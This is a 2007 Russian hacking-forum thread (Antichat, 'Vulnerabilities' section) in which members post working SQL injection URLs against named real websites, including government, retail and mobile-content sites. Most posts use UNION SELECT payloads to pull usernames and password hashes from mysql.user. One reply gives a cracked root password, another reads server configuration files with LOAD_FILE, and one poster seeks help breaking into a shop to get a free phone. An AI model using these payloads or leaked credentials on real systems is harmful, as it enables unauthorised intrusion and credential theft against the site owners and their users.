ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1831  
Старый 11.04.2007, 14:24
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


Arrow

Код:
http://www.energy.ca.gov/links/base.php?pagetype=-147+union+select+1,concat(user,char(58),password),3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147+from+mysql.user/*
@_@
Грузится около 350 кб. Кому делать нефиг =\

Последний раз редактировалось Spyder; 11.04.2007 в 14:27..
 
Ответить с цитированием

  #1832  
Старый 11.04.2007, 16:07
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

http://www.1mobile.ru/catalogue.php?group_id=1'

Помогите подобрать =) А то денег нет на сотик новый
 
Ответить с цитированием

  #1833  
Старый 11.04.2007, 16:10
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Можт кто подберет талицу, отпишитесь
Цитата:
http://www.laguna.by/base.php?id=-11+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

www.decosp.ru
  #1834  
Старый 11.04.2007, 17:07
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию www.decosp.ru

Код:
http://www.decosp.ru/index.php?idNew=-85+union+select+1,2,3,4,5,concat(user(),char(58),version(),char(58),database()),7/*
 
Ответить с цитированием

  #1835  
Старый 11.04.2007, 18:12
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

d-seller.ru


Интернет супермарккет!

Код:
http://d-seller.ru/index.php?page=mobilecontent&mkpage=indexjava.php&IDNew=-1087/**/union/**/select/**/1,concat(user,char(58),password),3,4,5,6,7,8,9,10/**/from/**/mysql.user/*&action=about&id=5&countCurrentPage=&sort=&chosenPhone=_&filterByPhone=
root:045a18944aed3d1b
 
Ответить с цитированием

  #1836  
Старый 11.04.2007, 18:19
Аватар для limpompo
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

Цитата:
Сообщение от zl0ba  
d-seller.ru


Интернет супермарккет!

Код:
http://d-seller.ru/index.php?page=mobilecontent&mkpage=indexjava.php&IDNew=-1087/**/union/**/select/**/1,concat(user,char(58),password),3,4,5,6,7,8,9,10/**/from/**/mysql.user/*&action=about&id=5&countCurrentPage=&sort=&chosenPhone=_&filterByPhone=
root:045a18944aed3d1b
логин: root
пасс: aqz910

===========
Заметил что hash одинаков с

https://forum.antichat.ru/showpost.php?p=334228&postcount=1921
===========
 
Ответить с цитированием

  #1837  
Старый 11.04.2007, 18:54
Аватар для ShadOS
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от zl0ba  
motvet.ru

Не плохой мобильный портал =)

Код:
http://motvet.ru/aboutgame.php?IDNew=-1038+union+select+1,2,3,4,5,6,concat(user,char(58),password),8,9,10+from+mysql.user/*&id=3
root:045a18944aed3d1b
уже было, юзайте поиск:
Цитата:
Сообщение от degeneration x  
Код:
http://motvet.ru/aboutgame.php?IDNew=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(99,58,92,119,119,119,92,99,111,110,102,92,104,116,116,112,100,46,99,111,110,102)),8,9,10/*
// показывает httpd.conf
А в базе интересного всё равно ничего нет, уж поверьте, я точно знаю из надёжных источников
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
 
Ответить с цитированием

  #1838  
Старый 11.04.2007, 19:04
Аватар для ShadOS
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от Constantine  
Можт кто подберет талицу, отпишитесь
Подобрал только вот эту (price):
Код:
http://www.laguna.by/base.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+price/*
и вот эту (tkan):
Код:
http://www.laguna.by/base.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tkan/*
боюсь, там мало интересного =/
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
 
Ответить с цитированием

  #1839  
Старый 11.04.2007, 19:09
Аватар для _GaLs_
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию

Код:
http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+user(),version()/*
http://www.origami.as/gallery.php?gallery=17&image=-304+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
http://www.buhgalteria.com.ua/Answer.html?id=2869+union+select+null,null/*

Последний раз редактировалось _GaLs_; 11.04.2007 в 19:14..
 
Ответить с цитированием

  #1840  
Старый 11.04.2007, 21:06
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Цитата:
Сообщение от _GaLs_  
http://www.buhgalteria.com.ua/Answer.html?id=2869+union+select+null,null/*[/code]
Код:
http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(password%20using%20cp1251)%20+from+mysql.user/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ